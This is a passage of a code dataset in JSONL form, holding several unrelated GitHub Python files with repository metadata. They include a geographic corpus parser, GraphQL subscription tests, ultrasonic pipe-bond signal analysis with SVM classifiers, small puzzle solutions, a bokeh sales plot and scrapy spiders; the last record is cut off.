open(Path(f\"{dataOutputDir}/{corpusId}.json\"), 'r') as f:\n jsonArray = json.load(f)\n\n uniqueTypes = set()\n\n for qResult in jsonArray:\n if (\"qParsed\" in qResult and\n \"cctrans\" in qResult[\"qParsed\"] and\n \"types\" in qResult[\"qParsed\"][\"cctrans\"]):\n\n for typeObj in qResult[\"qParsed\"][\"cctrans\"][\"types\"]:\n uniqueTypes.add(typeObj[\"type\"])\n\n if (\"rqParsed\" in qResult and\n \"cctrans\" in qResult[\"rqParsed\"] and\n \"types\" in qResult[\"rqParsed\"][\"cctrans\"]):\n\n for typeObj in qResult[\"rqParsed\"][\"cctrans\"][\"types\"]:\n uniqueTypes.add(typeObj[\"type\"])\n\n print(uniqueTypes)\n\n\nif __name__ == \"__main__\":\n rootDir = os.path.dirname(os.path.realpath(__file__))\n\n # [SC] folder with input corpora\n corporaDir = f\"{rootDir}/inputCorpora\"\n # [SC] data output folder\n dataOutputDir = f\"{rootDir}/outputData\"\n \n \n geoTwoJson = parseConceptTree(\"Geo201\", \"g201\") # GeoQuestions201 corpus\n geoQueryJson = parseConceptTree(\"GeoQuery\", \"geoq\") # GeoQuery corpus\n gikiJson = parseConceptTree(\"Giki\", \"giki\") # GikiCLEF/GikiP corpora\n geoClefJson = parseConceptTree(\"GeoCLEF\", \"geoclef\") # GeoCLEF corpora\n geoAnQuJson = parseConceptTree() # GeoAnQu corpora\n\n generateStats(\"Geo201\")\n generateStats(\"Geo201\", True)\n generateStats(\"GeoQuery\")\n 
generateStats(\"GeoQuery\", True)\n generateStats(\"Giki\")\n generateStats(\"Giki\", True)\n generateStats(\"GeoCLEF\")\n generateStats(\"GeoCLEF\", True)\n generateStats(\"GeoAnQu\")","repo_name":"quangis/AGILE2023-Semantic-complexity-GeoAnQu","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"4705771371","text":"# -*- coding:UTF-8 -*-\n# Author:Tiny Snow\n# Date: Sat, 20 Feb 2021, 21:32\n# Project Euler # 033 Digit cancelling fractions\n\n#====================================================================Solution\nfrom math import *\n\ndef is_curious(m, n):\n flag = False\n if str(m)[1] == str(n)[0] and str(n)[1] != '0':\n if int(str(m)[0]) / int(str(n)[1]) == m / n:\n flag = True\n return flag\n\nproduct_numerator = 1\nproduct_denominator = 1\n\nfor m in range(10, 100):\n for n in range(m + 1, 100):\n if m % 10 == 0 and n % 10 == 0:\n continue\n if is_curious(m, n) == True:\n product_numerator *= m\n product_denominator *= n\n\nprint(product_denominator // gcd(product_denominator, product_numerator))","repo_name":"Tiny-Snow/Project-Euler-Problem-Solutions","sub_path":"PE-Python/P033/P033.py","file_name":"P033.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"9996934034","text":"import asyncio\n\nimport pytest\n\nfrom tartiflette import Resolver, Subscription, create_engine\nfrom tartiflette.types.exceptions.tartiflette import (\n NonAsyncGeneratorSubscription,\n NotSubscriptionField,\n)\n\n_SDL = \"\"\"\ntype Query {\n search(query: String!): [String!]\n}\n\ntype MySubscription {\n newSearch(query: String!): [String!]\n customSearch(query: String!): [String!]\n}\n\nschema {\n query: Query\n subscription: MySubscription\n}\n\"\"\"\n\n_SEARCHS = [\n [\"Search #1\"],\n [\"Search #2\"],\n [\"Search #3\"],\n [\"Search #4\"],\n [\"Search #5\"],\n]\n\n\n@pytest.fixture(scope=\"module\")\nasync def ttftt_engine():\n @Subscription(\"MySubscription.newSearch\", schema_name=\"test_subscribe\")\n async def subscription_new_search(*_, **__):\n for search in _SEARCHS:\n yield {\"newSearch\": search}\n await asyncio.sleep(0.01)\n\n class MySubscriptionCustomSearchSubscriber:\n async def __call__(self, *_, **__):\n for search in _SEARCHS:\n yield {\"newSearch\": search}\n await asyncio.sleep(0.01)\n\n Subscription(\"MySubscription.customSearch\", schema_name=\"test_subscribe\")(\n MySubscriptionCustomSearchSubscriber()\n )\n\n @Resolver(\"MySubscription.customSearch\", schema_name=\"test_subscribe\")\n async def resolver_subscription_custom_search(parent, args, ctx, info):\n return [f\"{search} #c\" for search in parent[\"newSearch\"]]\n\n return await create_engine(sdl=_SDL, schema_name=\"test_subscribe\")\n\n\n@pytest.mark.asyncio\nasync def test_subscribe_error(ttftt_engine):\n i = 0\n\n async for result in ttftt_engine.subscribe(\n \"\"\"\n subscription ($query: String!) {\n newSearch(query: $query)\n }\n \"\"\"\n ):\n i += 1\n assert result == {\n \"data\": None,\n \"errors\": [\n {\n \"message\": \"Variable < $query > of required type < String! 
> was not provided.\",\n \"path\": None,\n \"locations\": [{\"line\": 2, \"column\": 23}],\n }\n ],\n }\n\n assert i == 1\n\n\n@pytest.mark.asyncio\nasync def test_subscribe(ttftt_engine):\n i = 0\n async for result in ttftt_engine.subscribe(\n \"\"\"\n subscription {\n newSearch(query: \"A query\")\n }\n \"\"\"\n ):\n i += 1\n assert result == {\"data\": {\"newSearch\": [f\"Search #{i}\"]}}\n\n assert i == 5\n\n\n@pytest.mark.asyncio\nasync def test_subscribe_aliases(ttftt_engine):\n i = 0\n async for result in ttftt_engine.subscribe(\n \"\"\"\n subscription {\n aSearch: newSearch(query: \"A query\")\n }\n \"\"\"\n ):\n i += 1\n assert result == {\"data\": {\"aSearch\": [f\"Search #{i}\"]}}\n\n assert i == 5\n\n\n@pytest.mark.asyncio\nasync def test_subscribe_custom_search(ttftt_engine):\n i = 0\n async for result in ttftt_engine.subscribe(\n \"\"\"\n subscription {\n customSearch(query: \"A query\")\n }\n \"\"\"\n ):\n i += 1\n assert result == {\"data\": {\"customSearch\": [f\"Search #{i} #c\"]}}\n\n assert i == 5\n\n\n@pytest.mark.asyncio\nasync def test_subscribe_custom_search_aliases(ttftt_engine):\n i = 0\n async for result in ttftt_engine.subscribe(\n \"\"\"\n subscription {\n aSearch: customSearch(query: \"A query\")\n }\n \"\"\"\n ):\n i += 1\n assert result == {\"data\": {\"aSearch\": [f\"Search #{i} #c\"]}}\n\n assert i == 5\n\n\n@pytest.mark.asyncio\nasync def test_subscribe_non_async_generator_implementation():\n with pytest.raises(\n NonAsyncGeneratorSubscription,\n match=r\"The subscription < .* > given is not an awaitable generator.\",\n ):\n\n async def subscription_search(*_, **__):\n return 1\n\n Subscription(\n \"Query.search\", schema_name=\"test_subscribe_non_subscription_field\"\n )(subscription_search)\n\n await create_engine(\n _SDL, schema_name=\"test_subscribe_non_subscription_field\"\n )\n\n\n@pytest.mark.asyncio\nasync def test_subscribe_non_subscription_field():\n with pytest.raises(\n NotSubscriptionField,\n match=\"Field < Query.search > isn't a subscription field.\",\n ):\n\n async def subscription_query_search(*_, **__):\n yield {}\n\n Subscription(\n \"Query.search\", schema_name=\"test_subscribe_non_subscription_field\"\n )(subscription_query_search)\n\n await create_engine(\n _SDL, schema_name=\"test_subscribe_non_subscription_field\"\n )\n","repo_name":"tartiflette/tartiflette","sub_path":"tests/functional/test_subscribe.py","file_name":"test_subscribe.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","stars":849,"dataset":"github-code","pt":"44"} +{"seq_id":"13831329971","text":"from numpy.fft import *\nfrom numpy.linalg import *\nfrom numpy import *\nfrom scipy.signal import *\nfrom scipy.optimize import minimize\nfrom matplotlib.pylab import plot,show\n\ndef FFTLengthPower2(N):\n\n return int(2**(ceil(log(N)/log(2))))\n\n\ndef localmax(x):\n\n indmax=(diff(sign(diff(x))) < 0).nonzero()[0] + 1\n\n return indmax\n\n\ndef localmin(x):\n\n indmin=(diff(sign(diff(x))) > 0).nonzero()[0] + 1 # local min\n\n return indmin\n\ndef rootind(x):\n\n sgn = sign(x)\n\n indroot = array(range(len(x)-1))\n\n indroot = indroot[sgn[0:-1]*sgn[1::] <= 0]\n\n return indroot\n\ndef moments(y,x=None,centre='mode'):\n\n from numpy import average,array,linspace,trapz\n from numpy.linalg import norm\n\n if x is None:\n\n x=linspace(0.,len(y)-1,len(y))\n\n m=[]\n\n m.append(trapz(y,x))\n y=y/m[0]\n\n if centre=='mean':\n m.append(trapz(x*y,x))\n elif centre=='mode':\n m.append(x[abs(y).argmax()])\n\n\n 
m.append(trapz(y*(x-m[1])**2,x))\n m.append(trapz(y*(x-m[1])**3,x)/(m[2]**1.5))\n m.append(trapz(y*(x-m[1])**4,x)/(m[2]**2))\n\n return m\n\n\ndef SimulateEchoes(d,K,dt=0.02,c=[2.05,1.98,2.91,5.9],rho=[0.94,0.94,1.5,7.8],alpha=[0.089,0.092,0.001],f0=6.5,BW=4.,T0=0.5,T=5):\n\n Zb = rho[0]*c[0]\n Za = rho[1]*c[1]\n Zp = rho[2]*c[2]\n Zs = rho[3]*c[3]\n\n Ta = 2*d[0]/c[1]\n Tp = 2*d[1]/c[2]\n Ts = 2*d[2]/c[3]\n\n ba = c[1]*alpha[0]\n bp = c[2]*alpha[1]\n bs = c[3]*alpha[2]\n\n N = FFTLengthPower2(round(T/dt))\n\n f = linspace(0,1/(2*dt),N/2+1)\n\n Rba = (Za-Zb)/(Za+Zb)\n Tba = 4*Za*Zb/(Za+Zb)**2\n\n dR = 2j*pi*(Za*Zp/K)*f\n\n\n\n Rap = (Zp-Za+dR)/(Zp+Za+dR)\n Rpa = (Za-Zp+dR)/(Zp+Za+dR)\n\n Tap = 4*Za*Zp/(Za+Zp+dR)**2\n\n Rps = (Zs-Zp)/(Zs+Zp)\n Tps = 4*Zs*Zp/(Zs+Zp)**2\n\n A = (Tap/Rap)*Rps\n\n f1 = f0-BW/2\n f2 = f0+BW/2\n\n frng=(f>=f1)&(f<=f2)\n\n a = -4*log(0.5)/(BW**2)\n\n X = -exp(-a*(f-f0)**2)*exp(-2j*pi*T0*f)\n\n X = Rba*X/max(abs(X))\n\n Hp = Rap\n\n Hp = Rap+Tap*Rps*exp(-2j*pi*Tp*f)*exp(-bp*Tp*f)+Tap*Rps*Rpa*exp(-4j*pi*Tp*f)*exp(-2*bp*Tp*f)\n\n Hs = -Tap*Tps*exp(-2j*pi*Ts*f)*exp(-bs*Ts*f)*exp(-2j*pi*Tp*f)*exp(-2*bp*Tp*f)*(1 + Rps*Rpa*exp(-2j*pi*Tp*f)*exp(-2*bp*Tp*f))\n\n H = Hp + Hs\n\n Y = X*exp(-2j*pi*Ta*f)*exp(-ba*Ta*f)*H*Tba/Rba\n\n x = ifft(2*X,N)\n\n y = ifft(2*Y,N)\n\n t = linspace(0,dt*(len(y)-1),len(y))\n\n return t,x+y\n\ndef AdhesivePrimerFit(T1,T2,b1,b2,p):\n\n from scipy.linalg import lstsq\n\n\n f = p[0]\n X = p[1]\n Y = p[2]\n # T1 = p[3]\n # T2 = p[4]\n\n # A = exp(-b1*T1*f)*exp(-2j*pi*T1*f)*hstack((ones((len(f),1)),exp(-b2*T2*f)*exp(-2j*pi*T2*f),exp(-4j*pi*T2*f)*exp(-2*b2*T2*f)))\n\n A = hstack((exp(-b1*T1*f)*exp(-2j*pi*T1*f)*X,exp(-b1*T1*f)*exp(-2j*pi*T1*f)*X*exp(-b2*T2*f)*exp(-2j*pi*T2*f),exp(-b1*T1*f)*exp(-2j*pi*T1*f)*X*exp(-4j*pi*T2*f)*exp(-2*b2*T2*f)))\n\n\n v,r,rnk,sval = lstsq(A,Y)\n r = float(r[0])/len(f)\n\n\n return v,r\n\n\n# def AdhesivePrimerFit(a1,a2,p):\n\n# f = p[0]\n# H = p[1]\n# T1 = p[2]\n# T2 = p[3]\n\n# relrtol = 1e-2\n# vtol = 1e-2\n# maxiter = 10\n\n# A = hstack((exp(-a1*T1*f)*exp(-2j*pi*T1*f),exp(-a1*T1*f)*exp(-a2*T2*f)*exp(-2j*pi*T1*f)*exp(-2j*pi*T2*f),H*exp(-2j*pi*T2*f)*exp(-a2*T2*f)))\n\n# v,r,rnk,sval = lstsq(A,H)\n\n# r = float(r)/len(f)\n\n# dv = 1.\n# dr = 1.\n\n# Niter = 0\n\n# while (dr > relrtol) & (dv > vtol) & (Niter < maxiter):\n\n# A = hstack((exp(-a1*T1*f)*exp(-2j*pi*T1*f),exp(-a1*T1*f)*exp(-a2*T2*f)*exp(-2j*pi*T1*f)*exp(-2j*pi*T2*f),H*exp(-2j*pi*T2*f)*exp(-a2*T2*f)))\n\n# W = diag(abs(1/(1-v[2,0]*exp(-2j*pi*T2*f)*exp(-a2*T2*f))**2).flatten())\n\n# vv,rr,rnk,sval = lstsq(dot(W,A),dot(W,H))\n\n# rr = float(rr)/len(f)\n\n# dr = abs((rr-r)/r)\n\n# dv = norm(vv-v)/norm(v)\n\n# v = vv\n\n# r = rr\n\n# Niter = Niter+1\n\n\n# return v,r\n\ndef AdhesivePrimerFitResidual(x,*params):\n\n v,r = AdhesivePrimerFit(x[0],x[1],x[2],x[3],params)\n\n return r\n\ndef ModelReconstruction(v,b1,b2,T1,T2,X,dt,N):\n\n s = linspace(0,1/(2*dt),int(floor(N/2)+1))\n\n # H = exp(-b1*T1*s)*exp(-2j*pi*s*T1)*(v[0,0]+v[1,0]*exp(-2j*pi*T2*s)*exp(-b2*T2*s)+v[2,0]*exp(-4j*pi*T2*s)*exp(-2*b2*T2*s))\n\n # # H = exp(-2j*pi*s*T1)*exp(-b1*T1*s)*(v[0,0]+v[1,0]*exp(-2j*pi*T2*s)*exp(-b2*T2*s))/(1-v[2,0]*exp(-b2*T2*s)*exp(-2j*pi*T2*s))\n\n\n # Y = H*X\n\n Y = exp(-b1*T1*s)*exp(-2j*pi*s*T1)*X*v[0,0]+v[1,0]*exp(-b1*T1*s)*exp(-2j*pi*s*T1)*X*exp(-2j*pi*T2*s)*exp(-b2*T2*s)+v[2,0]*exp(-b1*T1*s)*exp(-2j*pi*s*T1)*X*exp(-4j*pi*T2*s)*exp(-2*b2*T2*s)\n\n y = ifft(2*Y,N)\n\n return y,Y\n\n\ndef 
AdhesivePrimerFeatures(x,dt,frng,df=0.01,fprng=[2,10],d=[[1,2.5],[0.1,0.5]],c=[1.98,2.91],beta=[[0.14,0.22],[0.09,0.45]],exptype='immersion'):\n\n from scipy.optimize import brute\n\n from numpy.fft import fft\n\n if exptype=='immersion':\n\n gates=[(0.5,1.5,0.4,0.01),(1.75,4.25,3,0.01)]\n\n elif exptype=='contact':\n\n gates=[(0.,1.,0.4,0.01),(1.7,4.25,3,0.01)]\n\n\n F = []\n Hx = []\n\n\n\n NFFT = FFTLengthPower2(round(1/(df*dt)))\n\n for xx in x:\n\n try:\n\n if exptype=='immersion':\n\n xc = xx[abs(xx).argmax()::]\n\n elif exptype=='contact':\n\n xc = xx\n\n\n ig1= (int(gates[0][0]/dt),int(gates[0][1]/dt))\n ig2 = (int(gates[1][0]/dt),int(gates[1][1]/dt))\n\n iw = int(gates[0][2]/dt)\n\n im1 = abs(xc[ig1[0]:ig1[1]]).argmax()+ig1[0]\n im2 = abs(xc[ig2[0]:ig2[1]]).argmax()+ig2[0]\n\n il1,ir1 = (im1-iw,im1+iw)\n il2,ir2 = (im2-iw*gates[1][2],im2+iw*gates[1][2])\n\n b1 = mean(array(beta[0]))\n b2 = mean(array(beta[1]))\n\n\n T = dt*(im2-im1)\n\n\n x1 = xc[il1:ir1]\n x1 = detrend(x1)\n x1 = x1*tukey(len(x1),gates[0][3])\n\n x2 = xc[il2:ir2]\n x2 =detrend(x2)\n x2 = x2*tukey(len(x2),gates[1][3])\n\n\n im1 = abs(x1).argmax()\n im2 = abs(x2).argmax()\n\n\n X1 = rfft(x1,n=NFFT)\n X2 = rfft(hstack((zeros(il2-il1),x2)),n=NFFT)\n\n\n f = linspace(0.,1/(2*dt),NFFT/2+1)\n\n\n ff = (f>=frng[0])&(f<=frng[1])\n\n fphase = (f>=fprng[0])&(f<=fprng[1])\n\n fp = f[fphase]\n\n f = f[ff]\n\n df = f[1]-f[0]\n\n X1 = -X1\n\n H = X2/X1\n\n Hp = H[fphase]*exp(2j*pi*T*fp)\n\n phi = unwrap(angle(Hp))\n\n H = H[ff]\n\n G = log(abs(Hp))\n\n G1,G0 = polyfit(fp,G,1)\n\n A = exp(G0)\n\n dphi = detrend(savgol_filter(phi,3,2,deriv=1)*(1/df))\n\n\n indmin = localmin(detrend(imag(Hp)))\n\n indmax = localmax(detrend(imag(Hp)))\n\n ind = hstack((indmin,indmax))\n\n ind.sort()\n\n T2a = 1/(2*(mean(diff(ind))*df))\n\n indmin = localmin(dphi)\n\n indmin = indmin[argmin(dphi[indmin])]\n\n\n T2b = 1/(2*fp[indmin])\n\n T2 = array([T2b,3*T2b,5*T2b])\n\n T2 = T2[argmin(abs(T2-T2a))]\n\n print(T2)\n\n\n xx2 = ifft(2*X2,NFFT)\n\n\n T1 = [T-T2,T]\n\n # T1 = T-T2\n\n print(T1)\n\n X1 = X1[ff]\n X2 = X2[ff]\n\n param = (f.reshape((len(f),1)),X1.reshape((len(X1),1)),X2.reshape((len(X2),1)))\n\n\n\n RT = []\n\n for i in range(len(T1)):\n\n # param = (f.reshape((len(f),1)),H.reshape((len(H),1)),T1[i],T2)\n\n v,r = AdhesivePrimerFit(T1[i],T2,b1,b2,param)\n\n RT.append(r)\n\n iTmin = argmin(array(RT))\n\n T1 = T1[iTmin]\n\n # ranges = ((beta[0][0],beta[0][1]),(beta[1][0],beta[1][1]))\n\n # param = (f.reshape((len(f),1)),H.reshape((len(H),1)),T1,T2)\n\n # X1 = X1[ff]\n # X2 = X2[ff]\n\n # param = (f.reshape((len(f),1)),X1.reshape((len(X1),1)),X2.reshape((len(X2),1)))\n\n\n # R = brute(AdhesivePrimerFitPhaseResidual,ranges,param,Ns=10,finish=False)\n\n # R = minimize(AdhesivePrimerFitResidual,[b1,b2],args=param,bounds=[(beta[0][0],beta[0][1]),(beta[1][0],beta[1][1])],method='SLSQP')\n\n R = minimize(AdhesivePrimerFitResidual,[T1,T2,b1,b2],args=param,method='SLSQP')\n\n\n T1 = float(R.x[0])\n T2 = float(R.x[1])\n b1 = float(R.x[2])\n b2 = float(R.x[3])\n\n print(T1)\n print(T2)\n\n\n v,r = AdhesivePrimerFit(T1,T2,b1,b2,param)\n\n B0 = v[0,0]/v[1,0]\n B1 = v[2,0]/v[1,0]\n\n # x2m,X2m,Hm = ModelReconstruction(v,b1,b2,T1,T2,X1,dt,NFFT)\n\n x2m,X2m = ModelReconstruction(v,b1,b2,T1,T2,X1,dt,NFFT)\n\n\n # Hx.append([H,Hm[ff],xx2,x2m])\n\n Hx.append([X2,X2m,xx2,x2m])\n\n\n F.append([T1,T2,b1,b2,abs(B0),angle(B0),abs(B1),angle(B1)])\n\n except:\n\n pass\n\n Nfail = len(x) - len(F)\n\n return F,Nfail,Hx\n\n\n\n\nclass Pipe:\n\n def 
__init__(self,PipeId=None,BondStrength=[]):\n\n self.PipeId = PipeId\n self.BondStrength = BondStrength\n self.Signals = []\n self.Locations = []\n self.SteelThickness = []\n\n\n def ZeroMean(self):\n\n\n s=self.Signals.copy()\n\n for i in range(len(s)):\n\n self.Signals[i]=s[i]-mean(s[i])\n\n\n\n def LocationIndices(self,Locations):\n\n from numpy import array,tile\n from numpy.linalg import norm\n from copy import deepcopy\n\n L=array(deepcopy(self.Locations))\n NL=L.shape[0]\n\n ind=[]\n\n for l in Locations:\n ind.append(norm(L-tile(array(l),(NL, 1)),1).argmin())\n\n return ind\n\n def ReturnSignals(self,Locations):\n\n from copy import deepcopy\n\n x=array(deepcopy(self.Signals))\n\n ind=self.LocationIndices(Locations)\n\n return list(x[ind,:])\n\n\n def DeleteSignals(self,Locations):\n\n from numpy import array,delete\n\n ind=self.LocationIndices(Locations)\n\n x=list(delete(array(self.Signals),ind,0))\n l=list(delete(array(self.Locations),ind,0))\n self.Locations=l\n self.Signals=x\n\n\n def AddSignal(self,Signal,Location,WriteMode='Append',SamplingPeriod=None):\n\n if WriteMode is 'Append':\n\n (self.Signals).append(Signal)\n (self.Locations).append(Location)\n\n elif WriteMode is 'Overwrite':\n\n self.Signals=Signal\n self.Locations=Location\n\n if SamplingPeriod is not None:\n\n self.SamplingPeriod = SamplingPeriod\n\n\n def Export(self,Filename,Path):\n\n\n if Filename.split('.')[-1] == 'txt':\n\n from numpy import hstack,array,savetxt\n\n # Export Raw Data to a structured text file (comma delimited)\n data=hstack((array(self.Locations),array(self.Signals)))\n\n savetxt(Path+Filename,data,delimiter=',',header=str(self.PipeId)+','+str(self.BondStrength[0])+','+str(self.BondStrength[1])+','+str(self.SamplingPeriod))\n\n elif Filename.split('.')[-1] == 'p':\n\n from pickle import dump\n\n data={'PipeId':self.PipeId,'BondStrength':self.BondStrength,'Locations':self.Locations,'Signals':self.Signals,'SamplingPeriod':self.SamplingPeriod,'SteelThickness':self.SteelThickness}\n\n dump(data,open(Path+Filename,'wb'))\n\n def Load(self, File, Path):\n\n if File.split('.')[1] == 'txt':\n from numpy import loadtxt\n File = Path + File\n data = loadtxt(File,delimiter=',')\n\n self.Signals=list(data[:,2::])\n self.Locations=list(data[:,0:2])\n\n with open(File,'r') as f:\n\n header=f.readline()\n\n header=header[2::].split(',')\n\n self.PipeId = int(header[0])\n self.BondStrength = [float(header[1]),float(header[2])]\n self.SamplingPeriod = float(header[3].rstrip())\n\n elif File.split('.')[1] == 'p':\n\n from pickle import load\n\n pipe = load(open(Path + File,'rb'))\n\n if type(pipe) is dict:\n\n self.PipeId = pipe['PipeId']\n self.BondStrength = pipe['BondStrength']\n self.Signals = pipe['Signals']\n self.Locations = pipe['Locations']\n self.SamplingPeriod = pipe['SamplingPeriod']\n self.SteelThickness = pipe['SteelThickness']\n\n\nclass PipeSet:\n\n def __init__(self,Path):\n\n self.Path=Path\n self.Pipes = []\n\n\n def AddPipesByStrength(self,StrengthRanges):\n\n from os import listdir\n\n files=[f for f in listdir(self.Path) if f.endswith('.p')]\n\n for f in files:\n\n p=Pipe()\n p.Load(f,Path=self.Path)\n\n if any(abs(sum(array(StrengthRanges)-array(p.BondStrength),1))<1e-16):\n\n p.ZeroMean()\n self.Pipes.append(p)\n\n def AddPipesById(self,IdList=None):\n\n from os import listdir\n\n files=[f for f in listdir(self.Path) if f.endswith('.p')]\n\n if IdList==None:\n\n for f in files:\n\n p=Pipe()\n p.Load(f,Path=self.Path)\n\n self.Pipes.append(p)\n\n else:\n\n for f in files:\n\n 
p=Pipe()\n p.Load(f,Path=self.Path)\n\n if p.PipeId in IdList:\n\n self.Pipes.append(p)\n\n\n def ExtractFeatures(self,ContactType,FrequencyRange,ScansPerPipe=None,rand=False):\n\n from random import sample\n\n for p in self.Pipes:\n\n if ScansPerPipe==None:\n\n NScans=len(p.Signals)\n\n else:\n\n NScans=ScansPerPipe\n\n if rand:\n\n ind = sample(range(len(p.Signals)),ScansPerPipe)\n\n else:\n\n ind=range(NScans)\n\n signals = [p.Signals[i] for i in ind]\n\n F,Nfail,R = AdhesivePrimerFeatures(signals,p.SamplingPeriod,frng=FrequencyRange,exptype=ContactType)\n\n p.Features=array(F)\n p.NFailed=Nfail\n p.Reconstructions=R\n\n\n\n def MakeTrainingSet(self,StrengthRanges,Scale='standard'):\n\n ''' StrengthRanges list of lists defining the Bond Strength Ranges defining each class '''\n\n from sklearn import preprocessing\n from numpy import zeros\n\n X=zeros((1,4))\n y=zeros(1)\n\n for p in self.Pipes:\n\n bs=mean(p.BondStrength)\n\n for i in range(len(StrengthRanges)):\n\n if StrengthRanges[i][0]<=bs<=StrengthRanges[i][1]:\n\n\n X=vstack((X,p.Features))\n y=hstack((y,i*ones(shape(p.Features)[0])))\n\n y=y[1::]\n\n self.y=y.astype(int)\n\n X=X[1::,:]\n\n if Scale=='standard':\n\n ss = preprocessing.StandardScaler()\n\n self.FeatureScaling = ss.fit(X)\n\n X = ss.transform(X)\n\n elif Scale=='robust':\n\n ss = preprocessing.RobustScaler()\n\n self.FeatureScaling = ss.fit(X)\n\n X = ss.transform(X)\n\n self.X=X\n\n def FitRBFClassifier(self,C_range=logspace(-3,3,4),gamma_range=logspace(-3,3,4),niter=10):\n\n from sklearn.cross_validation import StratifiedShuffleSplit\n from sklearn.grid_search import GridSearchCV\n from sklearn import svm\n\n param_grid = dict(gamma=gamma_range, C=C_range)\n cv = StratifiedShuffleSplit(self.y, n_iter=niter, test_size=1/niter, random_state=42)\n grid = GridSearchCV(svm.SVC(), param_grid=param_grid, cv=cv)\n grid.fit(self.X, self.y)\n\n self.RBFClassifier = svm.SVC(C=grid.best_params_['C'],gamma=grid.best_params_['gamma'])\n self.RBFClassifier.fit(self.X,self.y)\n self.RBFScore = self.RBFClassifier.score(self.X,self.y)\n self.MaxDistance = max(self.RBFClassifier.decision_function(self.X))\n self.MinDistance = min(self.RBFClassifier.decision_function(self.X))\n\n self.RBFClassifierCVScore = grid.best_score_\n\n def FitLinearClassifier(self,C_range=logspace(-3,3,4),niter=10):\n\n from sklearn.cross_validation import StratifiedShuffleSplit\n from sklearn.grid_search import GridSearchCV\n from sklearn import svm\n\n\n param_grid = dict(C=C_range)\n cv = StratifiedShuffleSplit(self.y, n_iter=niter, test_size=1/niter, random_state=42)\n grid = GridSearchCV(svm.SVC(kernel='linear'), param_grid=param_grid, cv=cv)\n grid.fit(self.X, self.y)\n\n self.LinearClassifier = svm.SVC(kernel='linear',C=grid.best_params_['C'])\n self.LinearClassifierCVScore = grid.best_score_\n","repo_name":"lesagejonathan/pythoncode","sub_path":"ShawCor.py","file_name":"ShawCor.py","file_ext":"py","file_size_in_byte":16506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"42376784230","text":"cupcake=open(\"CupcakeInvoices.csv\")\n# for row in cupcake:\n# print(row)\n\n# for row in cupcake:\n# spliced=row.rstrip(\"\\n\").split(\",\")\n# for item in spliced:\n# if item== \"Strawberry\":\n# print(item)\n# if item == \"Chocolate\":\n# print(item)\n# if item == \"Vanilla\":\n# print(item)\n\n# for row in cupcake:\n# spliced=row.rstrip(\"\\n\").split(\",\")\n# total=int(spliced[3])*float(spliced[4])\n# print(total)\n# total=0\n# for row in 
cupcake:\n# spliced=row.rstrip(\"\\n\").split(\",\")\n# total+=int(spliced[3])*float(spliced[4])\n# print(total)\n\n# print(round(total, 2))\n\nfrom bokeh.plotting import figure, show\n\nx = []\ny = []\n\na=[]\nb=[]\n\nc=[]\nd=[]\n\nnum=0\nnum1=0\nnum2=0\nfor row in cupcake:\n spliced=row.rstrip(\"\\n\").split(\",\")\n for item in spliced:\n print(item)\n if item == \"Strawberry\":\n x.append(num)\n y.append(int(spliced[3])*float(spliced[4]))\n num+=1\n if item == \"Chocolate\":\n a.append(num1)\n b.append(int(spliced[3])*float(spliced[4]))\n num1+=1\n if item == \"Vanilla\":\n c.append(num2)\n d.append(int(spliced[3])*float(spliced[4]))\n num2+=1\n\n\n# prepare some data\n\n\n# create a new plot with a title and axis labels\np = figure(title=\"Cupcakes\", x_axis_label=\"invoice\", y_axis_label=\"profit\")\n\n# add a line renderer with legend and line thickness\np.line(x, y, legend_label=\"strawberry\", line_width=3, line_color=\"pink\")\np.line(a,b, legend_label=\"chocolate\", line_width=3, line_color=\"brown\")\np.line(c,d, legend_label=\"vanilla\", line_width=3, line_color=\"blue\")\n# show the results\nshow(p)\n\ncupcake.close()","repo_name":"smith-megan/data-python","sub_path":"data_presenter.py","file_name":"data_presenter.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"31207360935","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nimport heapq\n\nclass Solution:\n def mergeKLists(self, lists: List[Optional[ListNode]]) -> Optional[ListNode]:\n if not lists:\n return\n \n pq = self.getPQ(lists)\n return self.buildLinkedList(pq)\n \n def buildLinkedList(self, pq: List[int]) -> Optional[ListNode]:\n head = ListNode(0)\n tmp = head\n while pq:\n tmp.next = ListNode(heapq.heappop(pq))\n tmp = tmp.next\n return head.next\n \n def getPQ(self, lists: List[Optional[ListNode]]) -> List[int]:\n pq = []\n for node in lists:\n tmp = node\n while tmp:\n heapq.heappush(pq, tmp.val)\n tmp = tmp.next\n return pq\n \n","repo_name":"albertopha/ds-algo","sub_path":"LC/23/23-py3.py","file_name":"23-py3.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"3968321410","text":"\"\"\"\nDescription\n\"\"\"\n\nimport scrapy\nfrom scrapy.crawler import CrawlerProcess\n\n\nclass Spider(scrapy.Spider):\n name = \"pie\"\n start_urls = ['https://jobs.smartrecruiters.com/WernerEnterprises/743999661236574-dedicated-safety-representative']\n\n def parse(self, response):\n print(\">>>>>\", response.css(\"[itemprop='title']\").extract())\n\nif __name__ == \"__main__\":\n process = CrawlerProcess({\n 'USER_AGENT': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'\n })\n\n process.crawl(Spider)\n process.start()\n","repo_name":"itallmakesense/ETL-Example","sub_path":"pie.py","file_name":"pie.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22614174763","text":"import scrapy\nfrom ..items import ElectricbargainstoresItem\nimport requests\nimport os\nimport mimetypes\n\n\nclass StoreScraperSpider(scrapy.Spider):\n name = 'store_scraper'\n allowed_domains = ['www.electricbargainstores.com']\n start_urls = ['https://www.electricbargainstores.com/brands-s/3361.htm']\n\n def parse(self, response):\n\n sub_links = 
